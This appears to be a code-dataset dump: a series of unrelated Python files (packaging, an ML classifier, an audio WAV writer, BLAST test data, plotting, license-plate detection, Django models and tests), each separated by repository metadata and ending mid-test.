url='https://github.com/andreatramacere/jetset',
long_description=long_description,
long_description_content_type='text/markdown',
description="A framework for self-consistent modeling and fitting of astrophysical relativistic jets SEDs",
author_email='andrea.tramacere@gmail.com',
packages=['jetset', 'jetset.leastsqbound', 'jetset.jetkernel','jetset.tests'],
package_data={'jetset':['Spectral_Templates_Repo/*.dat','test_data/SEDs_data/*ecsv','./requirements.txt','ebl_data/*','mathkernel/*dat'],'jetkernel':['mathkernel/*dat']},
include_package_data = True,
cmdclass=custom_cmdclass,
ext_modules = [_module],
install_requires=install_req,
py_modules=['jetset.jetkernel/jetkernel'],
python_requires='>=3.7',
test_suite =_test_suite,
zip_safe=True)
| 34.901734
| 176
| 0.48791
| 1,469
| 0.243292
| 0
| 0
| 0
| 0
| 0
| 0
| 3,190
| 0.528321
|
9fd494efb313bbd651da7b57c11d4c1658a52fc3
| 1,610
|
py
|
Python
|
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
example/torch_classifier.py
|
KevinEloff/deep-chain-apps
|
0952845e93f0c0592f04275fe99b122ff831901f
|
[
"Apache-1.1"
] | null | null | null |
"""
Module that provide a classifier template to train a model on embeddings.
With use the pathogen vs human dataset as an example. The embedding of 100k proteins come
from the protBert model.
The model is built with pytorch_ligthning, a wrapper on top of
pytorch (similar to keras with tensorflow)
Feel feel to build you own model if you want to build a more complex one
"""
from deepchain.dataset import load_pathogen_dataset
from deepchain.models import MLP
from deepchain.models.utils import (
confusion_matrix_plot,
dataloader_from_numpy,
model_evaluation_accuracy,
)
from sklearn.model_selection import train_test_split
# Load embedding and target dataset
X, y = load_pathogen_dataset()
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.3)
train_dataloader = dataloader_from_numpy(X_train, y_train, batch_size=32)
test_dataloader = dataloader_from_numpy(X_val, y_val, batch_size=32)
# Build a multi-layer-perceptron on top of embedding
# The fit method can handle all the arguments available in the
# 'trainer' class of pytorch lightening :
# https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html
# Example arguments:
# * specifies all GPUs regardless of its availability :
# Trainer(gpus=-1, auto_select_gpus=False, max_epochs=20)
mlp = MLP(input_shape=X_train.shape[1])
mlp.fit(train_dataloader, epochs=5)
mlp.save_model("model.pt")
# Model evaluation
prediction, truth = model_evaluation_accuracy(test_dataloader, mlp)
# Plot confusion matrix
confusion_matrix_plot(truth, (prediction > 0.5).astype(int), ["0", "1"])
| 36.590909
| 90
| 0.775776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 856
| 0.531677
|
9fd54ac2fec1187dcd8824c5cc8a001bad343192
| 5,589
|
py
|
Python
|
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
towavfile.py
|
streamsoftdev/audiomods
|
0e3d27fcd9af0a0f6a9de512112425e093f82dda
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2022 Nathan Harwood
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import numpy as np
from pathlib import Path
import struct
from audiomodule.audiomodule import AM_CONTINUE, AM_CYCLIC_UNDERRUN, AM_ERROR, AM_INPUT_REQUIRED, MODULE_ERROR, \
AudioModule, sw_dtype, audiomod, nice_channels, nice_frequency_str, hms2_str
@audiomod
class ToWavFile(AudioModule):
name = "To WAV File"
category = "Signal out"
description = "Write the signal to a WAV file. Supports incremental writing to the WAV file."
def __init__(self, file: str = "",
num_channels: int = 2,
sample_width: int = 2,
**kwargs):
super().__init__(num_outputs=0, in_chs=[num_channels], **kwargs)
self.file = file
self.num_channels = num_channels
self.ready = True
self.wf = None
self.sample_width=sample_width
self.bytes_written=0
self.frames_written=0
self.requires_data = False
self.set_write_dtype()
def set_write_dtype(self):
if self.sample_width == 1:
self.write_dtype = np.int8
self.out_max = (2**7)-1
elif self.sample_width == 2:
self.write_dtype = np.int16
self.out_max = (2**15)-1
elif self.sample_width == 4:
self.out_max = 1.0
self.write_dtype = np.float32
async def next_chunk(self):
return await self.process_next_chunk()
def process_next_chunk(self):
if not self.wf:
return AM_ERROR
underrun,cyclic = self.input_underrun()
if (not self.input_pending()) or underrun:
if cyclic:
return AM_CYCLIC_UNDERRUN
else:
return AM_INPUT_REQUIRED
chunk = self.get_input_chunk().buffer
self.write_chunk(chunk)
return AM_CONTINUE
def write_chunk(self,chunk):
chunk *= self.out_max
interleaved = chunk.flatten()
out_data = interleaved.astype(self.write_dtype).tobytes()
self.frames_written+=len(chunk)
self.bytes_written+=len(chunk)*self.sample_width*self.num_channels
self.wf.write(out_data)
self.update_wav_header()
def update_wav_header(self):
current_pos = self.wf.tell()
self.wf.seek(0)
WAVE_FORMAT_PCM = 0x0001
bytes_to_add = b'RIFF'
_datalength = self.frames_written * self.num_channels * self.sample_width
bytes_to_add += struct.pack('<L4s4sLHHLLHH4s',
36 + _datalength, b'WAVE', b'fmt ', 16,
WAVE_FORMAT_PCM, self.num_channels, int(self.sample_rate),
self.num_channels * int(self.sample_rate) * self.sample_width,
self.num_channels * self.sample_width,
self.sample_width * 8, b'data')
bytes_to_add += struct.pack('<L', _datalength)
self.wf.write(bytes_to_add)
self.wf.seek(current_pos)
def open(self):
super().open()
if self.file != "" and self.file != None:
try:
self.wf = open(self.file, 'wb')
self.update_wav_header()
self.ready = True
except Exception as e:
self.observer.put(
(MODULE_ERROR, (self.mod_id, f"{self.file} could not be written to. {e}."), None))
self.ready = False
def close(self):
if self.get_in_buf(0).size()>0 and self.wf:
chunk = self.get_in_buf(0).get_all()
self.write_chunk(chunk)
super().close()
if self.wf:
self.wf.close()
self.wf = None
def reset(self):
super().reset()
if self.wf:
self.wf.seek(0)
self.bytes_written=0
self.frames_written=0
self.update_wav_header()
def get_widget_params(self):
return super().get_widget_params() | {
'meta_order': ['filename'],
'filename': {
'name': 'Filename',
'value': self.file,
'type': 'write-filename',
'filetypes': [('WAV files','*.wav *.WAV'),("All files","*.*")],
'defaultextension': '.wav'
}
}
def set_widget_params(self, params):
super().set_widget_params(params)
if 'filename' in params:
self.close()
self.file = params['filename']['value']
self.open()
def get_status(self):
if self.wf:
ch = nice_channels(self.num_channels)
status = {
'status':'ready',
'topleft':Path(self.file).name,
'topright':hms2_str(self.frames_written/self.sample_rate),
'bottom':nice_frequency_str(self.sample_rate),
'bottomleft':f"{self.sample_width*8} bit",
'bottomright':ch,
}
else:
status = {
'status':'error',
'bottom':"Valid filename required."
}
return status
| 33.668675
| 113
| 0.580247
| 4,753
| 0.85042
| 0
| 0
| 4,763
| 0.85221
| 74
| 0.01324
| 1,083
| 0.193773
|
9fd5c810c4ce10644e6de28ce2355f1bd5e61c6a
| 6,857
|
py
|
Python
|
test/blast/sample_data.py
|
UdoGi/dark-matter
|
3d49e89fa5e81f83144119f6216c5774176d203b
|
[
"MIT"
] | 10
|
2016-03-09T09:43:14.000Z
|
2021-04-03T21:46:12.000Z
|
test/blast/sample_data.py
|
terrycojones/dark-matter
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
[
"MIT"
] | 332
|
2015-01-07T12:37:30.000Z
|
2022-01-20T15:48:11.000Z
|
test/blast/sample_data.py
|
terrycojones/dark-matter
|
67d16f870db6b4239e17e542bc6e3f072dc29c75
|
[
"MIT"
] | 4
|
2016-03-08T14:56:39.000Z
|
2021-01-27T08:11:27.000Z
|
# Sample BLAST parameters.
PARAMS = {
'application': 'BLASTN',
'blast_cutoff': [
None,
None
],
'database': 'manx-shearwater',
'database_length': 17465129,
'database_letters': None,
'database_name': [],
'database_sequences': 70016,
'date': '',
'dropoff_1st_pass': [
None,
None
],
'effective_database_length': None,
'effective_hsp_length': 22,
'effective_query_length': None,
'effective_search_space': 382194648.0,
'effective_search_space_used': None,
'frameshift': [
None,
None
],
'gap_penalties': [
5,
2
],
'gap_trigger': [
None,
None
],
'gap_x_dropoff': [
None,
None
],
'gap_x_dropoff_final': [
None,
None
],
'gapped': 0,
'hsps_gapped': None,
'hsps_no_gap': None,
'hsps_prelim_gapped': None,
'hsps_prelim_gapped_attemped': None,
'ka_params': [
0.625,
0.41,
0.78
],
'ka_params_gap': [
None,
None,
None
],
'matrix': '',
'num_good_extends': None,
'num_hits': None,
'num_letters_in_database': 17465129,
'num_seqs_better_e': None,
'num_sequences': None,
'num_sequences_in_database': 70016,
'posted_date': [],
'query': 'GZG3DGY01ASHXW',
'query_id': 'Query_1',
'query_length': 46,
'query_letters': 46,
'reference': 'Stephen F. Altschul, Thomas L. Madden, ...',
'sc_match': 2,
'sc_mismatch': -3,
'threshold': None,
'version': '2.2.28+',
'window_size': None
}
RECORD0 = {
'query': 'id0',
'alignments': [
{
'length': 37000,
'hsps': [
{
'bits': 20,
'sbjct_end': 15400,
'expect': 1e-11,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 15362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 1296/99',
},
{
'length': 38000,
'hsps': [
{
'bits': 25,
'sbjct_end': 12400,
'expect': 1e-10,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 12362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Squirrelpox virus 55',
}
]
}
RECORD1 = {
'query': 'id1',
'alignments': [
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 11400,
'expect': 1e-8,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 11362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Monkeypox virus 456',
},
{
'length': 35000,
'hsps': [
{
'bits': 20,
'sbjct_end': 10400,
'expect': 1e-7,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 10362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Mummypox virus 3000 B.C.',
}
]
}
RECORD2 = {
'query': 'id2',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-6,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
# Identical to RECORD2, apart from e-value.
RECORD3 = {
'query': 'id3',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-5,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
RECORD4 = {
'query': 'id4',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 10,
'sbjct_end': 1400,
'expect': 1e-3,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 5,
'sbjct_end': 1400,
'expect': 1e-2,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 3,
'sbjct_end': 1400,
'expect': 0.0,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
| 27.538153
| 70
| 0.392737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,768
| 0.403675
|
9fd7af8273e6b7e9744ade794d211dd5ee462f86
| 420
|
py
|
Python
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2018-02-03T23:22:20.000Z
|
2018-02-03T23:22:20.000Z
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2018-05-12T13:55:01.000Z
|
2018-05-13T00:16:23.000Z
|
pyrigate/units/parse.py
|
pyrigate/pyrigate
|
366e33ef46ebc7928cf35f2d51ed0855c59d1a68
|
[
"MIT"
] | 1
|
2019-10-18T12:23:02.000Z
|
2019-10-18T12:23:02.000Z
|
# -*- coding: utf-8 -*-
"""."""
import re
_UNIT_STRING_REGEX = r'^([0-9\.]+)(ml|cl|dl|l)$'
def parse_unit(unit_string):
"""."""
lower_unit_string = unit_string.lower()
match = re.match(_UNIT_STRING_REGEX, lower_unit_string)
if match:
try:
return float(match.group(1)), match.group(2)
except ValueError:
return None, None
else:
return None, None
| 18.26087
| 59
| 0.57381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 64
| 0.152381
|
9fd914093a9d2ec4b79940394bc875e521269c52
| 6,659
|
py
|
Python
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | 2
|
2021-01-05T10:53:57.000Z
|
2021-02-26T09:15:14.000Z
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | 3
|
2020-12-15T11:29:25.000Z
|
2021-05-07T09:18:43.000Z
|
src/mhealth/data_analysis_tests/cross_correlator_test.py
|
hirsch-lab/mhealth
|
ad4287483cee206c7b8ff6216293f19d71296129
|
[
"MIT"
] | null | null | null |
import os
import glob
import unittest
from ..utils import testing
from ..utils import everion_keys
from ..utils.file_helper import FileHelper
from ..utils.data_aggregator import Normalization
from ..visualization.vis_properties import VisProperties
from ..data_analysis.cross_correlator import CrossCorrelator
_MHEALTH_DATA = os.getenv('MHEALTH_DATA', '../../resources')
_MHEALTH_OUT_DIR = os.path.join(_MHEALTH_DATA, 'output')
class CrossCorrelatorTest(testing.TestCase):
in_dir = f'{_MHEALTH_DATA}/vital_signals/'
in_dir_mixed = f'{_MHEALTH_DATA}/mixed_vital_raw_signals/'
out_dir = _MHEALTH_OUT_DIR
correlator = CrossCorrelator()
def test_cross_correlator_daily(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=self.in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys={'heart_rate', 'respiration_rate'},
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(6, len(files))
def test_cross_correlator_hours_vital(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=self.in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(3, len(files))
def test_cross_correlator_hours_mixed_vital_raw(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir_mixed,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=self.in_dir_mixed, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(5, len(files))
def test_cross_correlator_daily_mixed_vital_raw(self):
out_dir = FileHelper.get_out_dir(in_dir=self.in_dir_mixed,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=self.in_dir_mixed, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
files = list(out_dir.glob("**/*.png"))
self.assertEqual(25, len(files))
@testing.skip_because_is_runner
def test_cross_hours_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_days_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_VITAL,
short_keys=everion_keys.SHORT_NAMES_VITAL,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_correlator_hours_mixed_raw_vital(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_cross')
self.correlator.plot_hourly_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
@testing.skip_because_is_runner
def test_cross_correlator_days_mixed_vital_raw(self):
in_dir = ''
out_dir = FileHelper.get_out_dir(in_dir=in_dir,
out_dir=self.out_dir,
out_dir_suffix='_daily_cross')
self.correlator.plot_daily_correlations(
VisProperties(in_dir=in_dir, out_dir=out_dir,
normalization=Normalization.NONE,
keys=everion_keys.MAJOR_MIXED_VITAL_RAW,
short_keys=everion_keys.SHORT_NAMES_MIXED_VITAL_RAW,
min_scale=0, max_scale=100,
start_idx=0, end_idx=3))
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| 44.691275
| 78
| 0.565851
| 6,177
| 0.927617
| 0
| 0
| 2,906
| 0.436402
| 0
| 0
| 291
| 0.0437
|
9fd91ec0b1f55cd338e90af15b11bcbae0dc4915
| 1,471
|
py
|
Python
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | 2
|
2022-03-02T11:59:19.000Z
|
2022-03-18T17:59:28.000Z
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | 1
|
2022-03-03T14:07:19.000Z
|
2022-03-03T14:07:19.000Z
|
neurgoo/misc/plot_utils.py
|
NISH1001/neurgoo
|
83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from typing import Dict, List
try:
import matplotlib.pyplot as plt
MATPLOTLIB = True
except:
MATPLOTLIB = False
from loguru import logger
from .eval import EvalData
def plot_losses(losses):
if not MATPLOTLIB:
logger.error("Maplotlib not installed. Halting the plot process!")
return
plt.plot(losses)
plt.show()
def plot_history(
history: Dict[str, List[EvalData]], plot_type="loss", figure_size=(20, 7)
) -> None:
"""
This function plots train/val metrics in the same figure.
"""
if not MATPLOTLIB:
logger.error("Maplotlib not installed. Halting the plot process!")
return
train = history.get("train", [])
val = history.get("val", [])
# get epoch data common to both
t_epochs = list(map(lambda e: e.epoch, train))
v_epochs = list(map(lambda e: e.epoch, val))
epochs = set(t_epochs).intersection(v_epochs)
train = filter(lambda e: e.epoch in epochs, train)
train = sorted(train, key=lambda e: e.epoch)
val = filter(lambda e: e.epoch in epochs, val)
val = sorted(val, key=lambda e: e.epoch)
plt.figure(figsize=figure_size)
plt.plot([getattr(data, plot_type) for data in train])
plt.plot([getattr(data, plot_type) for data in val])
plt.legend([f"Train {plot_type}", f"Val {plot_type}"])
plt.xlabel("epoch")
plt.ylabel(f"{plot_type}")
def main():
pass
if __name__ == "__main__":
main()
| 23.349206
| 77
| 0.650578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 317
| 0.2155
|
9fdabb9fe3ddfe1efb0455a952de16d9ff31f05a
| 3,277
|
py
|
Python
|
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
LPSelectiveSearch.py
|
ksdsouza/license-plate-detector
|
900a032768d9c623b7ecb1ec7abd07651fda2b16
|
[
"MIT"
] | null | null | null |
import itertools
import os
import sys
import cv2
import numpy as np
from SelectiveSearch import SelectiveSearch
images_path = "Images"
annotations = "Annotations"
cv2.setUseOptimized(True)
selective_search = SelectiveSearch()
train_images = []
train_labels = []
SS_IMG_SIZE = (224, 224)
# chunk = int(sys.argv[1])
def get_annotation(file: str) -> (dict, object):
f = open(file)
[filename, x1, y1, dx, dy] = f.readline().split('\t')[0:5]
f.close()
img_filename = os.path.join(images_path, filename)
boundary_box = {
'x1': int(x1),
'y1': int(y1),
'x2': int(x1) + int(dx),
'y2': int(y1) + int(dy)
}
return boundary_box, img_filename
def get_iou(bb1: dict, bb2: dict) -> float:
x_left = max(bb1['x1'], bb2['x1'])
y_top = max(bb1['y1'], bb2['y1'])
x_right = min(bb1['x2'], bb2['x2'])
y_bottom = min(bb1['y2'], bb2['y2'])
if x_right < x_left or y_bottom < y_top:
return 0.0
intersection_area = (x_right - x_left) * (y_bottom - y_top)
bb1_area = (bb1['x2'] - bb1['x1']) * (bb1['y2'] - bb1['y1'])
bb2_area = (bb2['x2'] - bb2['x1']) * (bb2['y2'] - bb2['y1'])
iou = intersection_area / float(bb1_area + bb2_area - intersection_area)
assert iou >= 0.0
assert iou <= 1.0
return iou
# filenames = list(enumerate(
# f for f in os.listdir(annotations)
# if f.startswith('wts')
# ))[chunk * 20:(chunk + 1) * 20]
#
# for index, file in filenames:
# try:
# print(f"{index}\t{file}")
# boundary_box, img_filename = get_annotation(os.path.join(annotations, file))
# ss_results, img_out = selective_search.process_image(img_filename)
# lp_counter = 0
# bg_counter = 0
# fflag = False
# bflag = False
#
# for result in itertools.islice(ss_results, 2000):
# x1, y1, dx, dy = result
# if file.startswith('wts_textonly'):
# iou = 0
# else:
# iou = get_iou(boundary_box, {
# 'x1': x1,
# 'y1': y1,
# 'x2': x1 + dx,
# 'y2': y1 + dy
# })
# if bg_counter < 30:
# if iou < 0.3:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(0)
# bg_counter += 1
# else:
# bflag = True
# if lp_counter < 30:
# if iou > 0.85:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(1)
# lp_counter += 1
# else:
# fflag = True
# if fflag and bflag:
# break
# except Exception as e:
# print(e)
# print(f"Error occurred in {file}")
#
# np.save(f'train_images_chunk{chunk}', train_images)
# np.save(f'train_labels_chunk{chunk}', train_labels)
| 30.06422
| 97
| 0.523039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,054
| 0.626793
|
9fdadafb759d17ded7ccd299bdbfcf9faeff04b7
| 66
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_1_18_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
rx = re.compile(r'\b%s\b' % r'\b|\b'.join(map(re.escape, adict)))
| 33
| 65
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 17
| 0.257576
|
9fddbda4c3c7b498a0499af95d1e10c2e4bd8c81
| 233
|
py
|
Python
|
projects/admin.py
|
kylef-archive/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | 2
|
2015-02-15T19:01:29.000Z
|
2015-11-08T13:25:14.000Z
|
projects/admin.py
|
kylef/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | null | null | null |
projects/admin.py
|
kylef/django-projects
|
306043b7aea7a170adc70cb78844e039efc161d4
|
[
"BSD-2-Clause"
] | 1
|
2021-08-02T19:08:29.000Z
|
2021-08-02T19:08:29.000Z
|
from django.contrib import admin
from projects.models import Project
class ProjectAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ['title']}
list_display = ('title', 'git')
admin.site.register(Project, ProjectAdmin)
| 29.125
| 45
| 0.751073
| 119
| 0.51073
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.107296
|
9fde09067036bce742f20360db8b7e67c431adac
| 3,636
|
py
|
Python
|
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
core/tests/test_office.py
|
cjmash/art-backend
|
fb1dfd69cca9cda1d8714bd7066c3920d1a97312
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.db import transaction
from rest_framework.exceptions import ValidationError
from ..models import OfficeBlock, OfficeFloor, OfficeFloorSection
from core.tests import CoreBaseTestCase
User = get_user_model()
class OfficeBlockModelTest(CoreBaseTestCase):
"""Tests for the Office Block Models"""
def setUp(self):
super(OfficeBlockModelTest, self).setUp()
self.admin = User.objects.create_superuser(
email='testuser@gmail.com', cohort=19,
slack_handle='tester', password='qwerty123'
)
self.office_block = OfficeBlock.objects.create(
name="Block A"
)
self.office_floor = OfficeFloor.objects.create(
number=5,
block=self.office_block
)
self.office_floor_section = OfficeFloorSection.objects.create(
name="Right Wing",
floor=self.office_floor
)
self.all_office_blocks = OfficeBlock.objects.all()
self.all_office_floors = OfficeFloor.objects.all()
self.all_office_floor_sections = OfficeFloorSection.objects.all()
self.token_user = 'testtoken'
def test_add_new_office_block(self):
"""Test add new office block"""
self.assertEqual(self.all_office_blocks.count(), 1)
new_office_block = OfficeBlock(name="Block B")
new_office_block.save()
self.assertEqual(self.all_office_blocks.count(), 2)
def test_add_new_office_floor(self):
"""Test add new office floor"""
self.assertEqual(self.all_office_floors.count(), 1)
new_office_floor = OfficeFloor(
number=10,
block=self.office_block)
new_office_floor.save()
self.assertEqual(self.all_office_floors.count(), 2)
def test_add_new_office_floor_section(self):
"""Test add new Office Floor Section"""
self.assertEqual(self.all_office_floor_sections.count(), 1)
new_office_floor_section = OfficeFloorSection(
name="Left Wing",
floor=self.office_floor)
new_office_floor_section.save()
self.assertEqual(self.all_office_floor_sections.count(), 2)
def test_cannot_add_existing_office_block(self):
"""Test cannot add existing office_block name"""
self.assertEqual(self.all_office_blocks.count(), 1)
with transaction.atomic():
with self.assertRaises(ValidationError):
new_office_block = OfficeBlock.objects.create(
name="Block A"
)
new_office_block.save()
self.assertEqual(self.all_office_blocks.count(), 1)
def test_cannot_add_existing_office_floor_section(self):
